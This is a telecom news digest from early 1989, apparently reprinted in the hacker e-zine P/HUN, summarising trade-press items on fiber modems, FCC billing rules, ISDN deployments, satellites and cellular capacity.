|||
|
|
|||
|
|
|||
|
PROTEON UNVEILS FIBER MODEM:
|
|||
|
|
|||
|
Proteon Inc. has developed a single-mode, fiber-optic modem
|
|||
|
|
|||
|
that will extend the distance between 2 nodes on a token-ring
|
|||
|
|
|||
|
network, says Network World. The p3282 modem permits 2 nodes to
|
|||
|
|
|||
|
communicate over a maximum distance of 30 kilometers without using
|
|||
|
|
|||
|
a repeater. The fiber also uses optical laser technology instead
|
|||
|
|
|||
|
of LEDs for transmission of the signal. Cost: $10,000.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NETWORK CHARGES ARE DROPPED:
|
|||
|
|
|||
|
Transettlements Inc. has stopped making additional charges for
|
|||
|
|
|||
|
internetwork transmission, reports Computerworld magazine. The
|
|||
|
|
|||
|
firm will no longer charge its users fees, penalties or premiums
|
|||
|
|
|||
|
for interconnection with other value-added networks. The charge
|
|||
|
|
|||
|
for going through 2 networks will be the same for going through
|
|||
|
|
|||
|
only Transettlement's network.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
AIRLINES, HOTELS JOIN NETWORK:
|
|||
|
|
|||
|
GEnie, a consumer online information service from GE
|
|||
|
|
|||
|
Information Services, is now offering the Official Airline Guide
|
|||
|
|
|||
|
Electronic Edition Travel Service. The edition will permit GEnie
|
|||
|
|
|||
|
subscribers to view airline schedules, fares and hotel
|
|||
|
|
|||
|
information. Cost: A surcharge on GEnie of 17 cents/minute during
|
|||
|
|
|||
|
non-prime hours and a surcharge of 47 cents/minute during prime
|
|||
|
|
|||
|
time.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
RESERVATIONS ARE A TOUCH AWAY:
|
|||
|
|
|||
|
Harrah's Reno introduced a guest service center at the Reno
|
|||
|
|
|||
|
Airport yesterday that uses interactive, live video to streamline
|
|||
|
|
|||
|
guest reservations. Guests can check into Harrah's, make dinner
|
|||
|
|
|||
|
reservations and arrange to see a show by touching a TV screen.
|
|||
|
|
|||
|
The system uses Nevada Bell's new ISDN network that allows voice,
|
|||
|
|
|||
|
data and video communications to use fiber optic wires
|
|||
|
|
|||
|
simultaneously.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Feb. 22, 1989
|
|||
|
|
|||
|
PHONE USERS DO IT THEMSELVES:
|
|||
|
|
|||
|
US West's 35,000 Bellingham, Wash., customers will test the
|
|||
|
|
|||
|
first of what could be a major telephone innovation:
|
|||
|
|
|||
|
Instantaneous, do-it-yourself phone service. In the plan, a person
|
|||
|
|
|||
|
could shut off service, have a 3-way holiday conversation and have
|
|||
|
|
|||
|
calls sent to work - all by dialing a series of numbers. (For
|
|||
|
|
|||
|
more, see special Phones package below.)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SATELLITE TO SERVE INDONESIA:
|
|||
|
|
|||
|
Scientific-Atlanta has been selected to supply a half dozen
|
|||
|
|
|||
|
major communication systems in the Pacific Rim: A VSAT satellite
|
|||
|
|
|||
|
link for Indonesia and 5 private television networks for Japanese
|
|||
|
|
|||
|
firms. The satellite network will provide interactive data, video
|
|||
|
|
|||
|
and voice communications to as many as 4,000 sites on the 13,677
|
|||
|
|
|||
|
islands that make up the Republic of Indonesia.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NETWORKS TO GO ON NEW SATELLITE:
|
|||
|
|
|||
|
Nippon Telephone & Telegraph Co. of Tokyo and 4 other Japanese
|
|||
|
|
|||
|
companies said yesterday they will use Scientific-Atlanta's B-MAC
|
|||
|
|
|||
|
satellite technology to establish 5 private business television
|
|||
|
|
|||
|
networks in Japan. When their private television networks are
|
|||
|
|
|||
|
completed, Nippon, Nikken, Telecom Sat and Video Sat plan to send
|
|||
|
|
|||
|
video signals to JC-Sat, Japan's new communications satellite.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
TELCO ENTRY IS UNPREDICTABLE:
|
|||
|
|
|||
|
Congress will probably not address the issue of telephone
|
|||
|
|
|||
|
companies entering the TV business in the near future, National
|
|||
|
|
|||
|
Assn. of Broadcasters President Eddie Fritts tells Broadcasting
|
|||
|
|
|||
|
magazine. He says the telco entry will be one of the top issues of
|
|||
|
|
|||
|
the 1990s. But he stops short of making predictions, saying only
|
|||
|
|
|||
|
that free over-the-air broadcasting will survive.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
MORE STATIONS PICK UP SATELLITE:
|
|||
|
|
|||
|
Satellite-delivered talk-radio programs are growing as AM
|
|||
|
|
|||
|
station directors look more closely at the potential of
|
|||
|
|
|||
|
low-maintenance, national talk shows. Broadcasting magazine says
|
|||
|
|
|||
|
the 3 month-old American Radio Networks joined the field with 22
|
|||
|
|
|||
|
affiliates and now has 110 stations receiving its 24-hour
|
|||
|
|
|||
|
satellite service.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SATELLITES FLY FOR GERMAN TV:
|
|||
|
|
|||
|
Highly competitive satellite and cable TV services are expected
|
|||
|
|
|||
|
to grow significantly during the next 2 years in West Germany,
|
|||
|
|
|||
|
according to Broadcasting magazine. West German private TV channel
|
|||
|
|
|||
|
RTL Plus, a satellite-to-cable service, is expected to expand its
|
|||
|
|
|||
|
market to 10 million viewers. U.S. firm Capital Cities/ABC has a
|
|||
|
|
|||
|
holding in Tele-Munchen, part owner of the Tele5 satellite
|
|||
|
|
|||
|
channel.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SPECIAL PACKAGE ON PHONES:
|
|||
|
|
|||
|
-------------------------
|
|||
|
|
|||
|
SERVICE COULD START IN A SNAP:
|
|||
|
|
|||
|
Customers moving into new homes could start phone service
|
|||
|
|
|||
|
within minutes by dialing telephone responses to a series of
|
|||
|
|
|||
|
computer-voiced questions with a new service being tested by US
|
|||
|
|
|||
|
West Communications. Officials liken the change to the switch from
|
|||
|
|
|||
|
operator-assisted to direct-dial local calls in the 1920s or the
|
|||
|
|
|||
|
similar change in long-distance calls in the 1950s.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SERVICE COULD LINE THE WEST:
|
|||
|
|
|||
|
If an upcoming test of do-it-yourself phone service works in
|
|||
|
|
|||
|
Bellingham, Wash., another 2-year test will be done on the same
|
|||
|
|
|||
|
service in a larger market, such as Denver. If that also goes
|
|||
|
|
|||
|
well, the entire US West market - 14 states - will get the new
|
|||
|
|
|||
|
system by the year 2000. Throughout the test, all customers still
|
|||
|
|
|||
|
will be able to use their telephones as they now do.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FEATURES ARE A BUTTON AWAY:
|
|||
|
|
|||
|
US West customers with do-it-yourself service will be able to
|
|||
|
|
|||
|
start or stop telephone feature services at any time, including
|
|||
|
|
|||
|
such commonly used services as call forwarding and 3-telephone
|
|||
|
|
|||
|
conversations. These services already are available, but only by
|
|||
|
|
|||
|
calling US West sales representatives during daytime business
|
|||
|
|
|||
|
hours. The new system will allow changes to be made at any time.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Feb. 24-26, 1989
|
|||
|
|
|||
|
CELLULAR SIGNAL GOES FARTHER:
|
|||
|
|
|||
|
Pacific Telesis has installed antennas at both ends of an
|
|||
|
|
|||
|
Oakland, Calif.-area tunnel to carry signals from cellular car
|
|||
|
|
|||
|
telephones, reports Forbes magazine. Also: PacTel is using a solar
|
|||
|
|
|||
|
cell to power a repeater signal and extend coverage into Laguna
|
|||
|
|
|||
|
Canyon. Forbes says the developments are indications of coming
|
|||
|
|
|||
|
improvements in cellular transmissions.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
THE AIRWAVES ARE CROWDED:
|
|||
|
|
|||
|
The main problem for cellular phone users in large metropolitan
|
|||
|
|
|||
|
areas is the addition of new subscribers to already jammed
|
|||
|
|
|||
|
cellular systems, reports Forbes magazine. The FCC has allocated
|
|||
|
|
|||
|
only 437 channels of radio waves to each carrier. To add
|
|||
|
|
|||
|
customers, systems have been subdividing cells, with each cell
|
|||
|
|
|||
|
having low-power antennas that operate in limited boundaries.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SENDING COSTS WOULD BE HALVED:
|
|||
|
|
|||
|
Digital cellular technology could solve the problem of cramped
|
|||
|
|
|||
|
airwaves for cellular telephone systems, reports Forbes magazine.
|
|||
|
|
|||
|
With digital, ordinary radio interference is eliminated,
|
|||
|
|
|||
|
conversations are private, data from laptop computers can be sent
|
|||
|
|
|||
|
to the office from the road. Also: Digital cellular would cost
|
|||
|
|
|||
|
about half the transmission price because it's twice as fast.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
LOYOLA PLANS FOR ISDN USE:
|
|||
|
|
|||
|
AT&T recently said that the Definity 75/85 communications
|
|||
|
|
|||
|
system will be the base for an Integrated Services Digital Network
|
|||
|
|
|||
|
that will carry voice, data and images for Loyola University.
|
|||
|
|
|||
|
Computerworld says Loyola is expected to be the first commercial
|
|||
|
|
|||
|
customer to use Definity. By early next year about 7,000 phones on
|
|||
|
|
|||
|
the 3 Chicago-area campuses will be on the system.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
TELENET LINKS WITH STRATACOM:
|
|||
|
|
|||
|
Telenet Communications has made an agreement with Stratacom
|
|||
|
|
|||
|
Inc. to develop the technology for what the companies said will be
|
|||
|
|
|||
|
the first broadband Integrated Services Digital Network service to
|
|||
|
|
|||
|
be based on the ISDN frame relay interface, reports Computerworld.
|
|||
|
|
|||
|
Telenet, a subsidiary of U.S. Sprint, will integrate packet
|
|||
|
|
|||
|
switches with Stratacom digital multiplexers.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
THE PHONE IS IN THE BANK:
|
|||
|
|
|||
|
Banks are playing it smart with their money and are winning
|
|||
|
|
|||
|
price concessions from telephone companies by pitting carriers
|
|||
|
|
|||
|
against one another, reports Network World. Some banks are
|
|||
|
|
|||
|
negotiating for new services; others are cutting costs by striking
|
|||
|
|
|||
|
custom contracts with local carriers. Example: Irving Trust of New
|
|||
|
|
|||
|
York used MCI and AT&T to get a new international calling service.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CIA HELP IS NO SECRET:
|
|||
|
|
|||
|
The CIA linked its electronic-mail systems together with the
|
|||
|
|
|||
|
help of Soft-Switch, a company in Wayne, Pa., that specializes in
|
|||
|
|
|||
|
connecting multivendor E-mail systems, reports Government Computer
|
|||
|
|
|||
|
News. A key function of the software package: Directory services
|
|||
|
|
|||
|
that maintain information on all mail systems directly or
|
|||
|
|
|||
|
indirectly connected to the software.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FCC GETS COMPLAINT ON PACBELL:
|
|||
|
|
|||
|
Conference-Call USA, based in Chicago, has filed a complaint
|
|||
|
|
|||
|
with the FCC, accusing Pacific Bell of refusing to change its
|
|||
|
|
|||
|
practice of automatically routing all conference-call traffic to
|
|||
|
|
|||
|
AT&T, reports CommunicationsWeek. The firm says the practice is
|
|||
|
|
|||
|
stunting the growth of competitive companies.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
STUDENTS ARE ON THE PHONE:
|
|||
|
|
|||
|
School children in Denver are using computers and transmission
|
|||
|
|
|||
|
facilities from US West Advanced Technologies to communicate with
|
|||
|
|
|||
|
teachers, special subject experts and other students.
|
|||
|
|
|||
|
CommunicationsWeek says the equipment will be given to the school
|
|||
|
|
|||
|
system at the end of the school year. US West is using information
|
|||
|
|
|||
|
gained from the trial to plan an information gateway in Omaha,
|
|||
|
|
|||
|
Neb.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
HEARING IMPAIRED CAN MAKE CALLS:
|
|||
|
|
|||
|
The State Relay Center is scheduled to begin service Friday in
|
|||
|
|
|||
|
Birmingham, Ala. The new relay center was created to link
|
|||
|
|
|||
|
hearing-impaired customers by teletype to people they want to
|
|||
|
|
|||
|
call. The service is funded by a small surcharge on all phone
|
|||
|
|
|||
|
bills in the state.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Feb. 28, 1989
|
|||
|
|
|||
|
CALLERS MUST BE TOLD THE COST:
|
|||
|
|
|||
|
The FCC yesterday ordered 5 companies that charge customers 20%
|
|||
|
|
|||
|
to 80% more than AT&T, MCI or Sprint to toe the line. The
|
|||
|
|
|||
|
alternative operators must now tell callers how much the call will
|
|||
|
|
|||
|
cost and which company is placing it before it goes through. The
|
|||
|
|
|||
|
high rates usually are placed on hotel, airport or hospital
|
|||
|
|
|||
|
phones. (From the USA TODAY News section.)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FIRMS GIVE A PART OF REVENUES:
|
|||
|
|
|||
|
The phone companies told by the FCC yesterday to reveal costs:
|
|||
|
|
|||
|
Central Corp., International Telecharge Inc., National Telephone
|
|||
|
|
|||
|
Services Inc., Payline Systems Inc. and Telesphere Network Inc.
|
|||
|
|
|||
|
Right now all these companies buy phone time from a major carrier
|
|||
|
|
|||
|
such as AT&T and MCI and then give the hotel, airport or hospital
|
|||
|
|
|||
|
that uses the service a cut of revenues from every call.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CALLERS WILL GET MORE RIGHTS:
|
|||
|
|
|||
|
The FCC said yesterday that alternative long-distance operators
|
|||
|
|
|||
|
must: Put a sticker on the phone with price information or tell
|
|||
|
|
|||
|
the caller the price verbally; give callers an chance to hang up
|
|||
|
|
|||
|
without any charge; offer callers a chance to go through AT&T or
|
|||
|
|
|||
|
another phone service. Right now many alternative operators stop
|
|||
|
|
|||
|
you from using another carrier.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NISSEI PLANS A FAX EXPANSION:
|
|||
|
|
|||
|
Portable facsimile machine manufacturer Nissei says that a
|
|||
|
|
|||
|
major expansion of its operations will be completed within 2
|
|||
|
|
|||
|
months. To come: As many as 5 new fax machines, a revamping of the
|
|||
|
|
|||
|
field staff to cover all sales territories. Also: Vice President
|
|||
|
|
|||
|
John Haggerty says Nissei will move into other areas of the retail
|
|||
|
|
|||
|
information technology market.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
BELL GOES TO COLLEGE:
|
|||
|
|
|||
|
Bell Atlanticom Systems said yesterday it has signed a contract
|
|||
|
|
|||
|
with the College of William and Mary in Williamsburg, Va., for a
|
|||
|
|
|||
|
fully integrated voice and data communications system. The
|
|||
|
|
|||
|
campus-wide system will provide resale of communications services
|
|||
|
|
|||
|
to students, a management system, and a universal wiring plan to
|
|||
|
|
|||
|
provide voice and data transmission.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SYSTEM INCLUDES TRUNKS, LINES:
|
|||
|
|
|||
|
The communications system obtained by the College of William
|
|||
|
|
|||
|
and Mary yesterday will provide 300 trunks, 3,800 faculty and
|
|||
|
|
|||
|
student lines, 150 voice/data faculty users and 1,050 host data
|
|||
|
|
|||
|
ports. It includes more than 5,000 inside wiring runs and several
|
|||
|
|
|||
|
miles of fiber optics. Also included: A 1,000-user Aspen Voice
|
|||
|
|
|||
|
Mail System and the Alex-IS Telecommunications Management System.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
MESSAGES GO AROUND THE GLOBE:
|
|||
|
|
|||
|
GE Information Services has announced a new capability of its
|
|||
|
|
|||
|
QUIK-COMM System (electronic mailbox service) which enables users
|
|||
|
|
|||
|
to send QUIK-COMM messages to facsimile machines throughout the
|
|||
|
|
|||
|
world. Receiving fax machines must be Group III facsimile
|
|||
|
|
|||
|
terminals that conform to CCITT standards. Recipients do not have
|
|||
|
|
|||
|
to be QUIK-COMM System subscribers to receive the fax document.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
MCI GETS THE INSURANCE:
|
|||
|
|
|||
|
Northwestern Mutual Life Insurance Co. said yesterday it has
|
|||
|
|
|||
|
selected MCI Communications to replace AT&T's data network with a
|
|||
|
|
|||
|
nationwide data communications network linking Northwestern
|
|||
|
|
|||
|
Mutual's Milwaukee-based home office with its remote general and
|
|||
|
|
|||
|
district agency offices. The 3-year, multimillion dollar agreement
|
|||
|
|
|||
|
will eventually link more than 200 agency offices.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
BELLSOUTH GETS CLOSER TO EUROPE:
|
|||
|
|
|||
|
BellSouth Corp. has signed a definitive agreement to purchase
|
|||
|
|
|||
|
Air Call Holdings' shares in Air Call Communications, providers of
|
|||
|
|
|||
|
cellular, paging and telephone answering and telemarketing
|
|||
|
|
|||
|
services in the United Kingdom, Ireland and continental Europe.
|
|||
|
|
|||
|
BellSouth provides mobile systems services in the USA, Argentina,
|
|||
|
|
|||
|
Australia, Ireland and Europe.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SYSTEM OFFERS NEW OPTIONS:
|
|||
|
|
|||
|
New networking and programming capabilities for the McDonnell
|
|||
|
|
|||
|
Douglas REALITY Operating System are being scheduled for beta
|
|||
|
|
|||
|
testing at several customer sites, the company said yesterday.
|
|||
|
|
|||
|
Dubbed ROS 7.0, the system will offer capabilities previously
|
|||
|
|
|||
|
unavailable in PICK systems. Also: Data and processing can be
|
|||
|
|
|||
|
distributed transparent to users and, in cases, the programmer.
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
P/HUN Issue #4, Volume 2: Phile 11 of 11
|
|||
|
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
__________________________________
|
|||
|
|
|||
|
| |
|
|||
|
|
|||
|
| P/HUN Telecom News/Advancements |
|
|||
|
|
|||
|
| PART 2 |
|
|||
|
|
|||
|
| By DareDevil |
|
|||
|
|
|||
|
|_________________________________|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
March 3-5, 1989
|
|||
|
|
|||
|
PHONE LINES ARE SIMILAR:
|
|||
|
|
|||
|
The USA's major long distance phone services aren't that
|
|||
|
|
|||
|
different. A comparison of AT&T, MCI Communications Co. and Sprint
|
|||
|
|
|||
|
Communications Co. in the March Data Communications magazine
|
|||
|
|
|||
|
found, for instance: Calls placed over Sprint lines were slightly
|
|||
|
|
|||
|
louder than those placed over AT&T or MCI lines. All the calls,
|
|||
|
|
|||
|
however, could be heard clearly. (From the USA TODAY Money
|
|||
|
|
|||
|
section.)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SPRINT WAS MOST ACCURATE:
|
|||
|
|
|||
|
A study by Data Communications magazine says AT&T connected its
|
|||
|
|
|||
|
calls more quickly than other carriers. On average, it took 9.8
|
|||
|
|
|||
|
seconds to connect an AT&T call; 12.9 seconds for Sprint; 13.7
|
|||
|
|
|||
|
seconds for MCI. Also: Sprint had the ferest foulups. Only 2.3% of
|
|||
|
|
|||
|
the calls on its lines failed to go through on the first try; 4.9%
|
|||
|
|
|||
|
for AT&T; and 7.3% for MCI.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CRITICAL FIRMS CALL SURVEY FAIR:
|
|||
|
|
|||
|
When information was sent from one computer to another over
|
|||
|
|
|||
|
phone lines during a study by Data Communications magazine, AT&T
|
|||
|
|
|||
|
had the fewest glitches. Next best: Sprint, then MCI. The magazine
|
|||
|
|
|||
|
placed 150-180 calls over the trio's phone lines between 4 cities
|
|||
|
|
|||
|
last fall. Companies response: All had criticisms of the
|
|||
|
|
|||
|
comparison but, overall, said results appeared to be fair.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
PHONE FIRM ELIMINATES CHEMICAL:
|
|||
|
|
|||
|
AT&T says it's saving the ozone layer. The company says it has
|
|||
|
|
|||
|
developed a way to eliminate the chemical CFC-113 from a process
|
|||
|
|
|||
|
it uses to make electronic circuit boards. Scientists say the
|
|||
|
|
|||
|
chemical may damage the ozone layer of the earth's atmosphere,
|
|||
|
|
|||
|
which protects people from dangerous ultraviolet rays from the
|
|||
|
|
|||
|
sun. (From the USA TODAY Money section.)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SERVICE STOPPED IN CANADA:
|
|||
|
|
|||
|
Bell Canada has decided to end its 976 phone service in all of
|
|||
|
|
|||
|
its service regions, Telecommunications magazine says. The firm
|
|||
|
|
|||
|
said significant increases in cost and an anticipated decline in
|
|||
|
|
|||
|
revenues as primary factors in making the decision. Bell Canada is
|
|||
|
|
|||
|
the nation's largest telecommunications operating company.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
MCI FAX HAS SEVERAL FEATURES:
|
|||
|
|
|||
|
MCI has moved fast on fax. Telecommunications magazine reports
|
|||
|
|
|||
|
that MCI has become the first long-distance company in the USA to
|
|||
|
|
|||
|
offer a dedicated network for domestic and international fax
|
|||
|
|
|||
|
transmissions. Called MCI FAX, the service will include management
|
|||
|
|
|||
|
information reports, customized dialing plans, credit card billing
|
|||
|
|
|||
|
and other features.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
March 8, 1989
|
|||
|
|
|||
|
PACBELL TRUNK FEES SHOOT HIGHER:
|
|||
|
|
|||
|
Costs on Pacific Bell's Assured PBX Trunk Line Service have
|
|||
|
|
|||
|
jumped nearly 50%, according to Network World. The increase was
|
|||
|
|
|||
|
made after the California Public Utilities Commission approved a
|
|||
|
|
|||
|
PacBell plan to create a new trunk service and raise rates for
|
|||
|
|
|||
|
what was once the only grade of service available. One firm with
|
|||
|
|
|||
|
2,000 trunks will pay about $96,000 more per year.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
BELL PUTS FIBER INTO LAUNCH:
|
|||
|
|
|||
|
Southern Bell and Bell Communications Research engineers are
|
|||
|
|
|||
|
working with NASA to prepare for a high definition TV taping and
|
|||
|
|
|||
|
transmission of the launch of the space shuttle Discovery.
|
|||
|
|
|||
|
Broadcasting magazine says Southern Bell and Bellcore are handling
|
|||
|
|
|||
|
a live fiber-optic transmission of the launch. A temporary studio
|
|||
|
|
|||
|
has been built at Kennedy Space Center.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
RATES WILL DROP IN ALABAMA:
|
|||
|
|
|||
|
The Alabama State Public Service Commission said in Montgomery
|
|||
|
|
|||
|
yesterday that phone rates will soon drop in the state. Ordered:
|
|||
|
|
|||
|
South Central Bell must reduce rates by $9 million by April. Cuts:
|
|||
|
|
|||
|
25 cents off the monthly Touch-Tone service; the elimination of
|
|||
|
|
|||
|
the Touch-Tone installation fee.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SATELLITE FLIES FOR JAPAN:
|
|||
|
|
|||
|
The next launch of Arianespace is scheduled for the end of
|
|||
|
|
|||
|
March. Using the ELA 1 launch complex, an Ariane 2 launch vehicle
|
|||
|
|
|||
|
will place into orbit the Swedish direct broadcasting and
|
|||
|
|
|||
|
communications satellite TELE-X. The group last Saturday launched
|
|||
|
|
|||
|
the first Japanese telecommunications satellite JCSAT 1 and the
|
|||
|
|
|||
|
first European meteorological satellite MOP 1.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
OPTIONS ADDED TO VOICE LINE:
|
|||
|
|
|||
|
VoiceCom Systems has added 3 new service options to its voice
|
|||
|
|
|||
|
messaging product line, extended its worldwide communications
|
|||
|
|
|||
|
network, and created a new business unit to develop and implement
|
|||
|
|
|||
|
custom voice response applications. VoiceCom also introduced Guest
|
|||
|
|
|||
|
Mailbox service, which allows VoiceCom customers to temporarily
|
|||
|
|
|||
|
assign special voice mailboxes to their customers and vendors.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
MODEMS ARE SLEEK, SOPHISTICATED:
|
|||
|
|
|||
|
Some modems are being marketed like sleek sports cars. General
|
|||
|
|
|||
|
DataComm Industries is touting 2 new leased-line modems for
|
|||
|
|
|||
|
9,600-bit-per-second data communications as "the perfect balance
|
|||
|
|
|||
|
of technology and style," CommunicationsWeek says. Also: The
|
|||
|
|
|||
|
company says they include "sophisticated features" in "small,
|
|||
|
|
|||
|
stylish enclosures."
|
|||
|
|
|||
|
|
|||
|
|
|||
|
RADIO TELESCOPES LOOK IN SPACE:
|
|||
|
|
|||
|
112-foot-diameter and 210-foot-diameter radio telescopes in
|
|||
|
|
|||
|
NASA's Deep Space Network will be used in the search for
|
|||
|
|
|||
|
extraterrestrial intelligence in space. Located in the Mojave
|
|||
|
|
|||
|
Desert and Australia, the telescopes will survey the universe over
|
|||
|
|
|||
|
a wide radio frequency range and spot-check bands up to 25,000
|
|||
|
|
|||
|
megahertz for some signal that indicates intelligence.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
RADIO WILL SEARCH SILENT VALLEY:
|
|||
|
|
|||
|
NASA's radio network searching for intelligence in space will
|
|||
|
|
|||
|
cover at least 10,000 times more frequencies than all previous
|
|||
|
|
|||
|
surveys and be 300 times more sensitive. The search will hunt for
|
|||
|
|
|||
|
signals from stars similar to Earth's sun, up to 80 light years
|
|||
|
|
|||
|
from Earth. Of particular interest: The region from about 1,000
|
|||
|
|
|||
|
megahertz to 60,000 megahertz, the silent valley of frequencies.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
PHONE WILL KEEP HER IN TOUCH:
|
|||
|
|
|||
|
A telephone and computer electronic mail service will keep
|
|||
|
|
|||
|
Abigale K. Alling in touch with the world when she begins a 5-day
|
|||
|
|
|||
|
experiment today in the Arizona desert. She will enter a
|
|||
|
|
|||
|
20-foot-high, 23-foot-square test module through an air lock and
|
|||
|
|
|||
|
sever the umbilical cord with Earth. She will be cut off from
|
|||
|
|
|||
|
everything except sunlight and communication links with the
|
|||
|
|
|||
|
outside world.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
March 9, 1989
|
|||
|
|
|||
|
AT&T MAKES LINK, CHIP FOR JAPAN:
|
|||
|
|
|||
|
AT&T announced 2 products yesterday for Japan: A high-speed,
|
|||
|
|
|||
|
fiber optic data link and an Integrated Services Digital Network
|
|||
|
|
|||
|
(ISDN) microchip. The microchip can work with a variety of
|
|||
|
|
|||
|
microprocessors and other ISDN chips. It will more easily allow
|
|||
|
|
|||
|
Japanese telephone users to have access to a digital network that
|
|||
|
|
|||
|
can provide data, voice, and image transmission on one phone line.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
LINK WILL HAVE LAN, VIDEO USES:
|
|||
|
|
|||
|
AT&T is developing the ODL 125-FC Lightwave Data Link to comply
|
|||
|
|
|||
|
with Japan's industry standard for fiber-optic connectors, AT&T
|
|||
|
|
|||
|
said yesterday. Comprised of a receiver and transmitter, it
|
|||
|
|
|||
|
converts electrical signals to optical signals for fiber optic
|
|||
|
|
|||
|
data transmission. Applications include fiber-optic,
|
|||
|
|
|||
|
token-passing-ring Local Area Networks, and transmission of
|
|||
|
|
|||
|
digitized video signals.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NEW WATS JOINS THE MARKET:
|
|||
|
|
|||
|
Advanced Telecommunications has announced a new long distance
|
|||
|
|
|||
|
service, Standard PLUS WATS, designed for small business
|
|||
|
|
|||
|
customers. Standard PLUS WATS will benefit the business caller
|
|||
|
|
|||
|
whose monthly long distance bill exceeds $150, the company said.
|
|||
|
|
|||
|
Standard PLUS features volume discounts up to 21%, 6-second
|
|||
|
|
|||
|
incremental billing and free call detail.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CARRIER GROUP GIVES SUPPORT:
|
|||
|
|
|||
|
The Signaling System 7 from CCITT has won the support of the
|
|||
|
|
|||
|
National Telecommunications Network. SS7 would let NTN provide
|
|||
|
|
|||
|
Integrated Services Digital Network services, calling card
|
|||
|
|
|||
|
services and advanced toll-free services, reports Network World.
|
|||
|
|
|||
|
The 18,000-route mile network has customers in 175 cities.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
HUGHES OBTAINING NETWORK FIRM:
|
|||
|
|
|||
|
Sytek Inc., a producer of local network equipment, is being
|
|||
|
|
|||
|
bought by Hughes Aircraft for an estimated $50 million, Network
|
|||
|
|
|||
|
World reports. The deal still needs SEC approval. Sytek products
|
|||
|
|
|||
|
include broadband, fiber-optic and twisted-pair versions of
|
|||
|
|
|||
|
Ethernet and token-ring networks. The acquisition has been
|
|||
|
|
|||
|
discussed for months.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
TULSA METROLINK TO BE BOUGHT:
|
|||
|
|
|||
|
Dallas-based Columbine Telenet has entered an agreement to
|
|||
|
|
|||
|
purchase Tulsa MetroLink from Public Service Co. of Oklahoma,
|
|||
|
|
|||
|
officials said yesterday. Tulsa MetroLink is a 110 mile digital
|
|||
|
|
|||
|
fiber optic communications system founded in 1984 by PSO to
|
|||
|
|
|||
|
provide for high speed data and voice transmission to meet
|
|||
|
|
|||
|
internal communications needs.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
TULSA FIRM HAS LONGEST FIBER:
|
|||
|
|
|||
|
Tulsa Metrolink, which is being purchased by Columbine Telenet,
|
|||
|
|
|||
|
includes the longest single span of fiber in the USA - 1,944 feet
|
|||
|
|
|||
|
across the Arkansas River. The network can carry more than 400
|
|||
|
|
|||
|
million bits of data each second and can handle 6,000 simultaneous
|
|||
|
|
|||
|
voice conversations. Laser beams translate data or voice signals
|
|||
|
|
|||
|
into on-off lights sent through glass fibers finer than human
|
|||
|
|
|||
|
hair.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CXR LINE TO CROSS INTO KOREA:
|
|||
|
|
|||
|
CXR Telcom, worldwide supplier of systems for the
|
|||
|
|
|||
|
communications markets, has signed a 3-year licensing agreement
|
|||
|
|
|||
|
with Woojin Electronics and Telecommunications Ltd., of Seoul,
|
|||
|
|
|||
|
South Korea. Under the agreement, subject to Korean government
|
|||
|
|
|||
|
approval, Woojin will sell CXR's subscriber line test module to
|
|||
|
|
|||
|
the Korean authority for use in its new line of digital switches.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
